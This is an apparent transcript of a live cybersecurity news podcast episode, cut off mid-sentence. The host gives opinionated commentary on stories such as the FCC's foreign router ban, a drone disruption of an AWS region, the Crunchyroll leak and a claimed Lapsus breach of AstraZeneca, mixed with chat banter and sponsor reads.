🔴 Mar 25’s Top Cyber News NOW! - Ep 1096

A

All right, Good morning, everybody. Welcome to the party. Today is Wednesday, March 26th, 25th, 2026. This is episode 1096 of your Simply Cyber Daily Cyber Threat Brief podcast. I am your host, Dr. Gerald Ozier. And if you're looking to stay current on the top cyber news stories of the day while going beyond those headlines to get additional insights, value and basically just crush it like speed, run a cyber career development, then you're in the right place. We're gonna go through eight stories, I'm gonna break them down. Chat is above me right here and we are going to be crushing. I'm coming to you live From San Francisco, 5:00am Pacific Time left coast, people. I'm telling you, I, I feel you. I feel you. Let's get going. Also good news. The the audio. Welcome to the party, pal. Hopefully that didn't blow anyone's ears out. Let me know in chat. We're off and running. All right, what's up everybody? Definitely appreciate you here. Shout out to casually Joseph, who got into the studio behind or ahead of time to help me troubleshoot all this. I think we have it all together, which makes it a little bit more exciting. Good morning everyone. What's up? I want to say hello to Luca Lima and Marlon J. Steve Young. Slate Killer. Mad Destroyer. Coffee cup. Cheers. Mad Destroyer. Mad Destroyer is our resident coffee aficionado. I want you to know I'm drinking instant coffee, Starbucks, French rose. Mad Destroyer. But you can go ahead and roll, just roll and writhe and disgust at what I'm doing to to coffee this morning. Guys, we got a great show for you. As I mentioned in the intro, we're going to go through eight stories. I don't research or prep for any of these stories. It just makes the show better. I have no idea what I'm going to say and it, you know, it's going to be exciting. It's our last day here in San Francisco. As soon as the show is over, I'm going to pack all this gear up, head to the airport and then begin schlepping across the country back to my family and to the east coast where the time zone is, you know, a time zone that I think is a good time zone. Oh my God. So Phil Stafford, just throwing shade at my tortured bean water. Guys, I want to tell you every episode, whether I'm drinking this cup of coffee or I've got Mad Destroyer whipping up some tasty, you know, espresso using some type of high end machine from beans that were picked by a left handed man on the side of a mountain in the Andes. Every episode is worth half a cp. So don't be shy. Say what's up? In chat. Grab a screenshot if you're on mobile. We haven't quite solved that yet, but the deal is you, you'll be part of the show. You can see Cyber Rob getting in here with his CPES. The title of the show has the today's date, March 25th, as well as a unique identifier, episode 1096. So basically it's an hour show, but 30 minutes of it, we goof around. 30 minutes we work. So that's why we say half a cp. Believe me, you have more cps than you know what to do with. But advice being part of the Simply Cyber Daily Cyber threat brief. 120 possible per year. So say what's up? Grab that screenshot and file it away. Once a year, count screenshots, divide by two. Simple as that. I also want to say what's up? Welcome to the party. Hello. Here we go. Welcome to the party, pal. If you are here for the first time, I do not have obs quick links here. So I have to do this. I have to do this manually like a heathen. If you are here for the first time, do drop a hashtag, first timer in chat. Hashtag first timer in chat. Thank you, neckbeard. First timer in chat. And we want to celebrate you. Like, basically you might be like, oh, why would you celebrate me? I just got here. Like, listen, dude, welcome to the party. Welcome to the community. We want you to understand, everybody that's here for the first time was a first timer at some point. And they all said they were here for the first time and we all celebrated them. So don't be shy, we don't bite. We're all about good times. And if you do see someone in chat for the first time, ad Tech and Billy O'Reillena and Space Tacos and others, use that squad emote that. John McLean. Welcome to the party, pal. Welcome to the party. And let's welcome them. Mr. Buddha, Mr. Budalicious. Mr. Budalicious, here for the first time. Welcome to the party. Mr. Brutalicious. Definitely appreciate you being here. And since I can't do the. I can't do the on screen stuff because I'm, you know, in the mobile studio. Let's do this really quickly. This is my janky alternative solution, but it works. You know what I'm saying, Alan Bruh. All right. Hey, Mr. Budalicious. Welcome to the party, pal. We got you Covered for days. I hope you enjoy the stream. Enjoy the show. Now, every episode of the Daily Cyber Threat Brief is brought to you by the show's sponsors. Those sponsors, not only do I, you know, appreciate them as like, basically preferred partners like Threat Locker, Anti Siphon and Flare, all three of them sponsored the Daily Cyberthrow for the entire year, which gives me peace of mind that I can do the show and invest in the programming and everything and not be super sweaty about trying to chase down sponsors. James McQuiggin, welcome to all the first timers. This is an amazing community. One day you two will reach 39 months. What's up, James? Love it, love it, love it. So let's hear from the stream sponsors also. Shout out to Flair. They hosted me for dinner last night. It was quite nice. John Hammond was there. We hung out and high fived and I ate a. I ate a ridiculous amount of meat. Probably an absurd amount of meat, dude. Shout out to Flair. Go to Simply Cyber IO Flair. Hopefully you guys, some of you were able to do the 50 shades of bulletproof hosting training yesterday. Let me know if you did that. Training's behind us, but Kimberly can fix it. Coming off the top rope to drop the people's elbow, she says, James, one day you two will be at 49 months. LOL. I want everyone to know that like Kim, Kim even has like more months than I do. Like on the stream. Yeah, let me go. Yeah. Oh my God. One day I too will be where Kim and Justin are. Where Kim. Kim and Justin are. I can't believe I am. I'm the host and I, I ridiculously, I'm at 37 months. So yay. Celebrate to me. All right, so hey, listen, Flare Cyber Threat intelligence platform is absolutely sick. If you'd like to check it out, there's a two week free trial. I know many of you have already checked it out. If you have your own opinions in chat, I'm not going to censor you. If you think it's good, if you think it's bad, drop your thoughts in chat. I personally have used it. I think there's great value in it. And I know the people at Flare. It's not a huge company. I know the people there. I like the people there. I think they're very, very genuine people who are doing great work. So got to meet a new one last night in Andrean Bergeron, great researcher over at Flare. If you'd like to check out this platform, go to Simply Cyber IO Flare now and sign up. The thing is, they have to identify, verify your identity before they give you access to this information because it's like way too valuable. So go check that out if you will. Kyle says the flare training was great. Thank you for commenting, Kyle. Definitely not, not surprised by that. The 50 shades of bulletproof hosting is very cool. If you want, I think they have those shows on replay. You can go check that out also. Shout out to anti Siphon training. Guys, today is the day. The Sock summit is today at 10am so soon as the show ends, you know, go, you know, get a, get a sub from Publix. Get, you know, get situated, get a little cooler, put it next to your desk. You're not going to want to miss this dude all day training today virtual free. Still time to register I suspect to get this. And I just want to tell you really quickly of all these speakers who are talking, you know, Cheddarbob is a simply Cyber Community member. Wade Wells is a simply Cyber Community member. And I want to let you know Dan Reardon and I are in a private group chat. Oh, Dennis Keefe, 18 months. The community has helped me grow more than I could have imagined. 18 months. And Marcus Kyler at 39 months. James McCrug and I became squad members at the same time. And he reminds me to send mine. Ben Long. Thank you Marcus and Dennis. Guys, I'm in a private DM with Dan Reardon. This talk, this guy has been working on this talk for weeks. Like not just the slides and everything but like delivering it. Delivering it like an absolute boss. Go to anti Siphon training. Check out the Sock Summit if you've got time. He'll. He's going live at 2:30 Eastern Time. So if you only got time for like one talk, make that. I will be somewhere over the Rockies at this point but I do want to say Dan, I'm, I'm super pumped for you as well as all the other speakers. But like I just am like hit the bell for notifications on watching Dan Reardon's career. It's epic. All right. And finally Threat Locker Zero Trust platform application security denied by default. They've moved to the cloud with big recent update and upgrade to the platform. Love myself from Threat Locker. Go check it out. Quick word from them and then I'm going to melt your face. Mr. Buddha. I want to give some love to the daily cyber threat brief sponsor Threat Locker. Do zero day exploits and supply chain attacks keep you up at night. Worry no more. You can harden your security with Threat Locker worldwide companies like JetBlue Trust Threat Locker to secure their data and keep their business operations flying high. Threat Locker takes a deny by default approach to cyber security and provides a full audit of every action allowed or blocked for risk management and compliance. Onboarding and operation is fully supported by their US based Cyber Hero support team. Get a free 30 day trial and learn more about about how Threat Locker can help prevent ransomware and Ensure compliance. Visit threatlocker.com Daily Cyber. All right and really quickly during the ad read Fleetus post in the third delivering 20 gifted memberships. Fletus thank you so much buddy. Did we just become best friends? Yep. Definitely appreciate the the support obviously and then also sharing the love and getting 20 new members into the community. And if you are a squad member, basically your name will change to green on stream as well as you'll get access to a squad emote tray Reaper DOE says they have a question. All caps. So screaming from the back row I have a question. Reaper we're going to do the show right now, but stay tuned. At the top of the hour we're going to do a different show where I'll take as many questions as the chat has. So save that question and I will do everything in my power to get you an answer. But right now what I need you to do Mr. Buddha and fleet is post in the third mad destroyer top Hat Cat what I need you to do is sit back, relax and just let the cool sounds of the hot news oh my God Spicy wash over you in an awesome wave. I will catch you guys at the mid roll. Let's go. Hold on. I know the audio is not right. Hold on.

B

These are the cyber security headlines for Wednesday, March 25, 2026. I'm Rich Straffolino.

A

All right.

B

FCC Bans foreign routers the U.S. federal Communications Commission updated its covered list of products that will be borrowed from FCC clearance in the US to include all foreign consumer grade routers. It previously added most foreign made drones to the list. This plan applies to new device models so devices already on the market and previously purchased routers are not impacted. The FCC cited malicious actors have exploited security gaps in foreign made routers to attack American households, disrupt networks and enable espionage and facilitate intellectual property theft. As the reason for the ban. Router makers can appeal for conditional approval to sell in the US With a petition to the Department of Defense or Homeland Security.

A

Bro, bro, bro. All right. That's one way to make America great again. Just ban the selling of of technology from other countries. So this is like all right, guy, my guy. Listen, I don't even Know how you enforce this? Okay, like, so this is not a cyber security story. Okay, like what they're saying here. There's been some, there's been some, there's been some talk in the last, I don't know, six months or whatever that TP link, specifically a Chinese based device, a router switch kind of thing, they make a bunch TP links of business, not a device type. Okay. And there was some suspicion that like China was basically making these routers and then selling them like at, at a loss, effectively on Amazon. So you know, if, if me and you are going to buy a router and we just sort by price and we're a general end user and we don't know any difference between like this router and that router, it just delivers packets. Well, then I'll take the cheapest one. I'll take two of them. What the hell, right? So the argument was that like China was like slowly seeding US infrastructure with devices that they, they had compromised, they had a back door in persistence mechanisms. All this other crap, this has been rumor. My, my man. Like there are so many people in our industry who do hardware hacking. There's so many people in our industry who tinker and do making and stuff. You can take this TP link router and you can dump the firmware and reverse it, flip it, spin it, smack it, whatever you want and see if there is baked in malware or malicious intent. Oh, by the way, you can stick the TP link router on, on a, on a, on a network and span port out and look to see if it reaches out for C2 communication. I have seen zero research or any independent in information on any of these devices doing any of this stuff. Okay? So to me, like, what are you basing this law? Like what are you basing this on? You know what I mean? Like it, it just seems like, I don't, I don't know, man. It seems like authoritarian propaganda. Like you can't, like, no, you can't buy these devices. If this is like a, a financial play, fine. But don't, don't, don't dress it in national security clothing. This isn't a cyber story, guy. I don't even know how this is going to work. Two things. One, DJ B said this too. Like what? Routers are not made like outside the us like what, what are our options now? You know what I mean? And then think about fair market too. Like, so now I can only buy a TP link router, cost 100 bucks. But now, now my only Option is a thousand dollar router that's made in Ohio. I don't know. Just, I, I'm not, I'm not a fan. I'm actually annoyed by this. I'm annoyed by this. Let's see. Like, my, my thing is there's been no evidence to suggest that these are implanted with malware or anything like that. Says malicious. And here's the thing. The FCC says malicious actors have exploited security gaps in Ford made routers to attack American households. Dude, any router that has default creds on it can be accessed. I don't care if it's made in Toledo or it's made in Taiwan. Plus, again, like, I'm going to get on to the next story in a second. I'm getting like super annoyed by this story. What about routers that are made in friendly countries? Like, so if the UK makes a router, Australia makes a router, Japan makes a router, Taiwan makes a router, South Korea makes a router, those are banned. This is like the most ham fisted, blunt policy making I've seen in a while, my man. Whatever. And by the way, like, hold on. Like, by the way, Like, what are you gonna stop at routers for? You know what I mean? Like, like drones are made somewhere else. My TV has an IP address and it was made in Korea. You know what I mean? Like, like what? I don't know, man. I don't know. I don't know. I'm not a fan. Not a fan. Let me know in chat if you think I'm like, overreacting. Number one, this isn't a cyber story, okay? And number two, I think this is Puppycock. Complete hogwash.

B

Disrupts AWS region. For the second time in a month, Amazon saw an AWS region disrupted due to proximity to the US Israeli war on Iran. The company confirmed its Bahrain region suffered a disruption due to drone activity. Without going into too many specifics, it's not clear if the facility was hit directly by a drone, it was struck nearby, or something else. It's unclear how long the disruption will last. Amazon said it's in the process of helping to migrate customers to alternate regions in the interim. Amazon said the previous drone strike on a UAE facility earlier this month caused water damage, structural damage, disrupted power delivery to our infrastructure, and in some cases required fire suppression.

A

All right. Hey, Slate Killer Squad membership. Thanks, dude. Okay, so here's the deal. In 2026, this is like a reality when we look at the OSI stack, which I'll show you on stream right now, OSI stack, okay? And I know John Strand wants to personally fight anyone who, who uses the OSI stack, but anyways, listen, this is a network stack, okay? The bottom is the bits and bytes going across the wire. The orange one is the nick or the network interface card, like the thing that the cable plugs into the actual board, okay? And then the yellow is the network layer. This is where you get your IP address. The light green is transport. This is listening services, like port 80, port 443, web traffic, whatever. And then above its data in apps. Okay, here's my thing. When you try to connect to something like AWS and it doesn't work, the first thing most people do is pop open a command shell and ping the IP address. This is Network Troubleshooting 101, okay? And if you've been around for like 15 seconds, you already know this, all right? We typically try to work on that yellow and light green layer when we're trying to solve the problem. It's not super common. Or eventually we get to the physical layer. Even like my studio setup on Monday, I was like a hot mess Express. It's because I had a hardware issue with the software, couldn't see the hardware or whatever, right? So a lot of times when we think of cyber and attacks and everything, we're thinking of, you know, denial of service at the network layer, or we're thinking of exploitation of, you know, some listening service and getting up into the. To the endpoint. Well, the reality is sometimes it's at the physical layer, and when you launch a kinetic explosive into a data center, it. It impacts the physical layer, right? So this, this is like. That's what I'm saying. In 2026, like, up until now, we haven't had to really deal with physical layer problems of this kind of material. And now it's got to be written into your risk profile. So if you are operating, what does this mean for you as a practitioner? Right? Because you might be like, what's, what's the deal with this one? Listen, if you are supporting an organization that's international, if you're supporting an organization that relies on AWS for, you know, for delivering services as well as business continuity. If you're in multiple regions, like the Middle east is in conflict right now, and this is something that you absolutely should think about in your risk profile. I will let you know, like, as an example, because you might be like, what does this even mean? What's this guy talking about? Let me give you an example. Like Netflix, right? When you go on Netflix and you want to stream Ted Lasso, and I know Ted Lasso is not on Netflix, I just selected that as a example. Or Altered Carbon. Okay, let's pick one that's really there. And you want to stream Altered Carbon. If, if you're in San Francisco and you're streaming Altered Carbon. Or if you're in Australia and you're streaming Altered Carbon. Or if you're in Abu Dhabi or. Yeah, Abu Dhabi and you're streaming Altered Carbon, we're not pulling from the same resource. Okay? For stream quality, quality of service, consumer customer experience, There are multiple CDNs and servers hosting that catalog. And, and if you're in the Middle east, right, you're going, you're in Dubai, you're going to watch Altered Carbon. It's probably coming from this AWS Bahrain region. So that is how something like this could affect you. So if you are in this situation, you should be thinking about business continuity, disaster recovery. Because if a drone blows up a data center, you can't restore that from backups like spoiler alert, physical layer is physical layer. Also while we're here, since I, I love doing this personally and I'm feeling myself this morning. NIST853, I'm going to say PE6 physical and environmental monitoring. Physical access. No, that's like swipe badges and stuff. Is a PE4. No, damn it. I want to, I want to basically bring people's attention to this. When we think of cybersecurity controls, a lot of times we're thinking of technical controls, operational controls, access, you know, creation, modification, termination. We're looking at patching and you know, vulnerability scanning, like very technical stuff. And that's because 85, 90% of our threats are cyber criminals, hackers, nation states. But don't sleep on the other 10%, which is like physical and environmental. I live in an area where hurricanes are quite real. We have to account for hurricanes. If you have a data center, like that's a, some small businesses and MSPs are definitely going to feel seen here for a second. If you have a data center which is basically a janitor in the hallway and that's where you like a couple server coming into the business and there's like a slop sink in there or there's an air conditioner in there and, and you've mounted it above or the, the rack is like near the slop sink water could get on that technology and cause it to malfunction or, or you know, destroy itself. So don't sleep on the physical environmental controls, okay? They are real controls. Shout out to nist. I do love myself some NIST firm.

B

Data leak. Last week, an anonymous threat actor contacted several outlets claiming to have stolen roughly 100 gigabytes of Crunchyroll support ticket information. This information was allegedly obtained through a breach Telus employee account. After posting the information on a few illicit forums, the anime streaming giant confirmed the data was legitimate. This contains information on about 6.8 million people exposing IP addresses, names, emails and partial credit card numbers. The threat actors asked for a $5 million ransom to not leak the data. But Crunchyroll did not negotiate.

A

All right, so I mean, Crunchyroll is an anime thing. I, I'm, I'm well aware of Crunchyroll. We are subscribers of Crunchyroll. Shout out to Crunchyroll for one member of my family. I, I don't have Crunchyroll on my, on my devices. Dude. Here's the d, here's the deal. It's a tech company. They got hit with ransomware. They're not going to pay the, the ransom. Like, that's it, that's the story. I mean, Crunchyroll is well known. It is a, it is a tech business, but at the end of the day, that's all it is. It's cool that it's anime, but like it could have been Netflix, it could have been, you know, 2 bo or whatever, Pluto, like, whatever. It's a streaming service. And the good news is I, I, here's the deal. I bet you anything if the ransomware attack had affected the, the delivery of content of Crunchyroll, they may have been more inclined to pay the ransom if, if that would have helped them get back up and running. But as far as I know, you know, Akira kept streaming, right? One piece kept streaming. So like, there was no operational impact to the mission critical service of Crunchyroll, which is to deliver anime content to subscribers. I don't know the full extent of like what they got hit, whether it was just like, yeah, look at this. Okay, so again, I don't research or prep for these stories, so I don't know exactly what it's going to say or what I'm going to say, but they said at this time, we believe that the information is primarily limited to customer service ticket data following an incident with a third party vendor that is not remotely related to, to any type of operational delivery or mission critical service of Crunchyroll. And I know it's silly because it's a cartoon service and whatever, but like, if you boil it down and just think about it, it's brass tax. This is a business that makes money by delivering streaming content to people that pay them money, and they had no impact to that. In fact, honestly, this seems like something that they don't even really need to execute. Business continuity. I'm not remotely surprised that they aren't going to pay the $5 million that it's. I feel like this is, like, basically hitting a speed bump at 30 miles an hour. They're just like. And just keep on going. Like, they didn't even. I didn't see any brake lights on. Crunchyroll, you're picking up what I'm putting down. All right, Way to go. Also, great opportunity to remind everybody you should be doing tabletop exercises. Tabletop exercises, everyone. Very, very powerful. I guess. Control. I wouldn't really think of tabletop exercises as a control. It technically is a control. But tabletop exercises is a phenomenal way to identify gaps in your overall response processes, identify gaps in knowledge or training of your staff, which is not, by the way, like, here's another thing. Like, if you're gonna do a tabletop exercise, I. I recommend it. Like, start with just the IT team and say, hey, we've had a ransomware attack. And, like, these servers are. Are down. What do we do? Don't. Don't make it a safe space, right? Like, so if Kevin is the one who does everything, you know, be like, hey, Kevin, like, you're on vacation for this exercise. So, like, your phone, you have no cell service. You're not in this room. All right? You get hit with ransomware. What do you guys do? Kevin's not here, right? So now maybe you identify that. Like, the rest of the staff have no frigging clue how to use Veeam. Or, like, Kevin is the only one who has an account into V and he didn't tell anyone because Kevin doesn't trust anyone else. Like, that's a huge finding. And it doesn't mean that Kevin made a mistake, although Kevin did make a mistake. We're just not going to call it out. Or it means. It doesn't mean that the junior staff who don't have accounts or don't have the training or anything are doing bad work. It's just an identified gap. And trust me, you want to solve this gap and close it over tacos on a Tuesday in April. Not when you're getting punched in the mouth by a Kira ransomware, where they're demanding money and everything's gone to crap and. And you're down and you're not making money and Your phone's ringing every 15 minutes because the CEO wants to know what the hell is going on. And you got legal counsel, you know, on the bridge, and you're working through the weekend. That is not the time to figure out that you have a gap in your training, your experience, your. Your workflows. All that tabletop exercises are unbelievably valuable. Go get some.

B

Today makes a bet on Bureau of Emerging Threats. After announcing it nearly a year ago, the US State Department formally launched this new entity with a mandate to protect American national security against advanced threats from foreign adversaries, specifically naming Iran, China, Russia, and North Korea. This includes cyber attacks as well as emerging threats such as quantum computing and AI enabled attacks and the weaponization of space. The Bureau of Emerging Threats will have five divisions. The Office of Critical Infrastructure Security, the Office of Cybersecurity, the Office of Disruptive Technology, the Office of Space Security, and the Office of Threat Assessment and.

A

Oh, my God. Okay, Office of. What was that? Like? Did they just, like, ask chat CPT to, like, give them some new offices? Holy crap, dude. Look at this guy. This is a former chairman of the Parliament of Iran, but, like, I think we're burying the headline. My God, is this guy. Look at how many mics this dude has. This might be a record. Like, I've seen some press conferences at the super bowl. There was like six or seven mics. This dude is. This makes me think of like, you ever seen the. It's like bicycles in, like, maybe China or whatever, where the Guy has, like, 30 phones on it and he's like, doing deliveries. This is nuts, dude. This is stupid. Why can't they just, like, pipe out the audio and let the reporters pick it up somewhere else? Good grief. And then I feel bad for, like, this far left one, this Ukrainian colored looking one on the far left. That guy's getting no audio. You might as well. You might as well get, like, you know, ASL person on the side doing the sign language like they do during emergency services. All right, I digress. Thank you for letting me lose my mind on this microphone. All right, so they're having. The Bureau of Emerging Threats where he revealed sweeping reorganization plan for the department. Okay, here's my thing. Here's my thing. Okay. Yeah, thank you. Justin Gold. Here we go. Justin Gold with the assist. Okay, there we go. This is what I'm talking about. This is nuts. All right, here's my thing. Okay, I don't. I don't. I don't know. Like, I don't know. I don't think we need the Department of Emerging Threats. Like, to me, that is the capability of the staff of the Department of Defense or the NSA or Interior or Department of State. You know what I mean? Like, like, you should be like, guys, the whole reason we do the daily cyber threat brief is because as practitioners, we have to stay current on current and emerging threats. We don't stand up a new department for like, and by the way, like, darpa, you know, like, like think tanks like Miter and Rand and sri, like jpl. Like, those think tanks are doing the research and delivering reports to decision makers on emerging threats. Like, why are we segmenting this out as its own thing? Like, again, I have a. I have a. I have a thought on why they're doing this, and I. I'm not going to share it because it's very political and I'm trying to keep this show apolitical. But, like, I don't know, man. I don't. Here's my thing too. Okay, really quickly. This isn't. This is a cyber adjacent story. The only thing I'll say about this is like, our, like, do we have budget for this? I guess that's all. How I'll put it. Do we have budget to stand up several new bureaus? I don't know. I don't know. And by the way, by the way, like, Department of Emerging Threats. To, like, look at Quantum, my guy. Like, Quantum's almost solved already. Looking at AI like, wait, wait. Like, the bus has. Like, you can't even see the back of the bus. The buses left so long ago on these. On these things. Maybe they're just using them as examples, but, like, I don't know. Not a fan. Not today's news stories are a bit bothersome. Like, standing up all these new things and then like, banning the selling of foreign routers.

B

Thanks to today's sponsor, Threat Locker. Least privilege isn't about distrusting users. It's about limiting blast radius. Many attacks succeed because malware inherits excessive permissions. Enforcing least privilege helps ensure that even if something goes wrong, attackers can't easily escalate access or move laterally across the environment. Learn more@threatlocker.com

A

all right, hold on. I'm gonna. I have to, like, manually turn the volume down so I can play. All right, that's the best I can do. Okay. All right, guys. Hey, again, this is the mid roll. We are a few minutes over. I do want to say really quickly, Reaper Doe. Who's. Who is. I'm pretty sure Reaper Doe is a first Timer this week. So welcome back to the party, pal. Reaper Doe. And he asks, do they pay you to be filtered? No, no, it's just like, dude, when you talk religion or when you talk politics, it's the conversations break down because people get emotional and flip out. So I try to keep this show because this is for cyber security professionals and cyber adjacent professionals, because I do know we have sales people who join this call or join this session daily in order to better understand how cyber security practitioners think. But no one, like, you don't want to hear my politics or me flip out about stuff. But. But I will certainly talk about it. Just catch me irl. I actually had a wonderful conversation with John Hammond and Nick Escoli last night about AI cyber hamburger Hamburglar, 35 months. All right, hey, Shout out to the Stream sponsors Threat Locker, Anti Siphon and Flare. Genuinely appreciate them. Every single day of the week has a special segment. And Wednesdays is Way Back Wednesday where we kind of like, I don't know, talk about like a. An older tech and what it. What it was, what it used to be. Yeah, I'm trying to think, like, I, you know, I don't know. Here's. Okay, here's one for you, Dude. People my kids will never know. Never know. You guys remember payphones, dude, you said, like, literally you would have to, like, carry change on you. When was the last time you had change on you? Wade Wells is in the chat. My man, Wade Wells. Welcome to the party. Yeah, Wade. I don't even say that word anymore. I'm trying to kill it, guys. Pay phones, dude, you used to have to, like, carry money. You would have to drive around and find a phone. The reason I bring it up is because phones in general. We were talking last night about modems and BBSs and dialing in and just shout out, like, if you didn't know this, like, say you're new to industry or you're young payphones. There was an entire discipline within the hacking or cyber security community around abusing payphones. There was blue box, there was clear box. One of the coolest stories that I know of is Kevin Paulson hacking not in Porsche. This guy. This was like early 90s, this guy, Kevin. Kevin Paulson, he attacked Pacific Bell in like, I don't know, 19, whatever, 1990, attacking phones and stuff like that. And he won. Basically. A radio station was doing a contest where like, the 95th caller wins a Porsche and he hacked the phone systems and he was caller one, caller two, caller three, caller four, and then caller 95. And he won the Porsche, which is like a legend story. Obviously, it's illegal to do that and he was held accountable, but obviously he's exciting and successful now. So just a little fun. Fun fact payphones just throw a little way back Wednesday vibes. All right, guys, we got the La la las. Let this wash over you. We're gonna get back into the news. Mr. Buddha. We do this every day. Let. This was. La. Yeah. I mean, while we're on the topic, casually Joseph dropped us in chat. But I mean, we. This is a legend thing right here. You should know about this. This is like, our industry's, like, lore, if you will. This is cyber security lore. You don't. This will never be on a security plus exam. You'll never be asked in a job interview about this. But just know attacking phones was called freaking P H R E A K I N G Freaking. And there was a guy named Captain Crunch who was like a legend freaker. And it's because he could use the Captain Crunch whistles. And it. The. The actual toy that came in the cereal boxes happened to make a tone at the same frequency that's pay phones would listen to. So he could use the whistle to like, basically get free calls and stuff like that. Cyber Shin and Gummy dropping his 2232 months. Excuse me. Blue badge. Thank you so much. Also, hey, really quickly for chat, I, I, I. When I was adding the Kool Aid band Emote, I noticed that right now, I think if you're a member for one year or three years or something, you get the blue badge. We can do new badges for like four years, five years, all the way up, I think into 10 years. So if you guys want that, to me, like, the blue is the, the community color blue. So I don't know if you'd want a new one, but I don't know, it'd be cool. If anyone has any ideas, drop that in chat. Yes, Kimberly can fix it. Talking about how you could make a collect call and they would ask you to say your name, but you could just say, like, come pick me up. And you can, like, hack it that way. Sierra Montgomery with her blue badge or squad membership badge. I love it. So good. All right, guys, let's keep cooking. Yeah. Oh, hold on one second.

B

US treasury considers expanding terrorism insurance to cyber. The treasury is seeking public comment in a Federal Register notice about the effectiveness of the Terrorism Risk insurance program, or TRIP. This was created in 2002 in the wake of the 911 attacks, providing a federal backstop to make terrorism Risk insurance more available.

A

Thank you.

B

Mara Levy specifically asked for feedback on any potential changes to trip that would encourage the take up of insurance for cyber related losses arising from acts of terrorism. Public comment will be accepted until May 8th and the law authorizing trip is set to expire in 2027 lapses.

A

All right, so obviously 9, 11. The Towers terrorism attack on U. S soil. TJ with 11 month squad membership. Mara, leave me 20 months. Thank you. So, all right, let's see what this actually is because I, I don't. Nerman, my friend Nerman. Good to see you, Nerman. My thing is like so cyber insurance is really wild. Okay? Cyber insurance is definitely valuable and you should have cyber insurance. But it's tricky because if you look at the not Petya attack, specifically Zurich national or Zurich International, their insurance provider, they got absolutely ramroded by the not Petya attack to the tune where like they actually tried not to pay out because they considered it an act of war. FedEx 23 months, my man and Mondelez and Merce Shipping both got a huge. Not a payday but like they got made whole by Zurich International. So cyber insurance is definitely dodgy. So I don't know how the treasury gets involved about terrorism cyber risk insurance program. But I don't know if it's such a great idea for public sector to back stop insurance programs. Especially if we get hit with like a pretty gnarly one. Yeah, see how it says federal backstop? I don't know. Here's my thing, here's my thing, okay. There's only one Internet and attacks happen all the time. Roswell UK and Luke Canfield, thank you very much. Squad memberships 30 months and 22 months for those guys. Great to see you guys. Now we're trinity two years. Good times. Love it. Listen, here's the deal. The problem with cyber insurance is like if, if, if you live in like a flood zone, it's easy for insurance companies to like adjust the rates. With cyber attacks it's very difficult because WannaCry crushed lots of businesses. But like, you know, Akira ransomware might hit one business, right? Like Crunchyroll got hit, right? So maybe you could say, oh, the likelihood of you getting a ransom attack is whatever. So here's your insurance policy. But these like, these cyber attacks, they can scale at such a level that it's it, it exposes the insurance companies to a lot of risk, financial risk. So how having a federal backstop I feel like would put the United States in a pretty tricky position like not bankrupt the US Right but the idea is that like an insurance company would, would be protected if there was a, an attack, cyber attack that, you know, basically screwed over a bunch of businesses. Here's my thing. Define. Define a terror attack, right? Because B. Dash. Welcome to the squad, my man. Here's. Here's what I'll say about this. Klopp ransomware hit tons of businesses last year. Okay. With the, with the Cleo. Madame Cleo. Lol. With the Cleo file server exploit. Change Healthcare. If you guys remember Change Healthcare last year got hit by. Who hit Change Healthcare? Was it Ransom Hub? It was actually. It was freaking. Oh my God. Who. Who did Dark side become? They became Black Matter. Alfie Black Cat. Right, so Alfie Black Cat hits Change Healthcare. They were a financially motivated cyber criminal organization, but they absolutely screwed over the healthcare industry at scale. Are you going to call that a terror attack? Like a terror attack like nation state backed? Or could it be something like, you know, Cobra, right? G.I. joe and Cobra. Cobra wasn't nation state. They were just a terror faction. So I think that this is a very slippery slope and could expose the United States at some to some serious financial liability when it doesn't really need to be there. Because like, why? What's wrong with the insurance industry? Like they are. They've been doing insurance for hundreds of years. I think they're going to be okay. All right, so anyways, tldr, I don't know. I don't think the treasury needs to do this, but if you have a separate opinion, drop it in chat. Those are just my thoughts.

B

Claims it breached AstraZeneca. The Lapsis extortion group added the pharma giant to its leak site. Researchers at Soc Radar report that known members of Lapsus have been boasting on illicit forums that it exfiltrated roughly 3 gigabytes of data from AstraZeneca. These allegedly include credentials, tokens, application code for controllers, repositories, services, schedulers, configuration files and spring boot resources, as well as employee data. Interesting. For an extortion group, there was no price set for these supposedly purloined data. Socradar says the nature of the stolen data suggests that it may have affected internal business operations.

A

All right, hold on. I haven't even pre read this. I'm just reading this because Kimberly put it in chat and I have high, high, high trust for Kimberly not to screw me over. Chris Pattern says shared in LinkedIn but forgot YouTube is where the hotness is. This is true. Was able. Oh wait, actually I forgot I had. That was Able to get a new gig as an infosec PM a few months back. Appreciate the constant perspective from the stream. Oh, my God. Okay, hold on one second. And Mr. Buddha, who's our first timer here, may not know this, but everybody does know this. Here we go. Here we go. We celebrate. We celebrate wins, like getting certs and stuff, but we also celebrate. Yes, sir. Yes, sir. Congratulations, Chris, and thanks for sharing with the community. Super pumped for you. Go crush it. I know it's been a few months, but I do have a video on the channel on how to absolutely destroy your. Your first 90 days like a boss. So go check that out. Where. Where's the story that. Okay, hold on. There we go. Know your threats. 40 months I'm here. Drink tea and sipping Simply Cyber. All right, Love it. Know your threats. And thanks for 40 months. Know your threats. That's super cool, man. All right, listen, Big Pharma got hit. Lapsis is, you know, a very legit threat actor, right? They're part of the comm. They're this shiny hunter. Lapsis scattered spider, you know, group. They do a lot of vishing or voice fishing. These guys compromised internal codes, creds, and employee data. So let's see what's up. They only got three gigs of data, which is not a lot when it comes to like data exil and extortion. It depends on what data right is. You know, if it's sensitive data, then that's a problem. All right, so they got creds and tokens. Those. Those tokens will have to be expired and the creds will have to be reset. Of course, that sucks. The internal code repositories can't change that. That's. That is what that is. Let's see what else we got here. All right, GitHub, creds, SQL scripts, table definitions. Okay, so like some sensitive, sensitive infrastructure stuff. It doesn't look like they got like the. The recipe for, you know, insert AstraZeneca pharmaceutical drug here. So we'll see. This doesn't look like it was a. This doesn't look like it impacted AstraZeneca's operational performance. They're still making drugs, I guess, is what I'm saying. So I. I don't think that they'll pay the story. Let's see, let me see. Is there a dollar sign in here? Nope. All right, so there's no amount that they're being asked. Is the word initial in here? Nope. So this story is super high level. Like, it doesn't explain how they got hacked it doesn't explain what the ransom is. It doesn't explain anything. It just says that a big pharma got hit with a. With a hack. This story, it. If this story. If this story turns sideways, it'll disappear. That's how thin and not useful this is. I will say, if you do work in pharmaceutical, this would be a great one to grab. I have a good friend who works in pharma, and his organization isn't super cyber forward as far as, like, taking cyber security seriously. So this is a great one and just a reminder to everybody. There's stories every single day of hacks and attacks. And, you know, you can pick and choose anyone you want to help your agenda and help sell or not sell, but help properly convey and communicate the importance and value that cyber security brings to an organization. But when there's one that's directly in your industry, absolutely grab that with both hands and don't let go. So if you work in pharma, the CEO, the cfo, the head of research 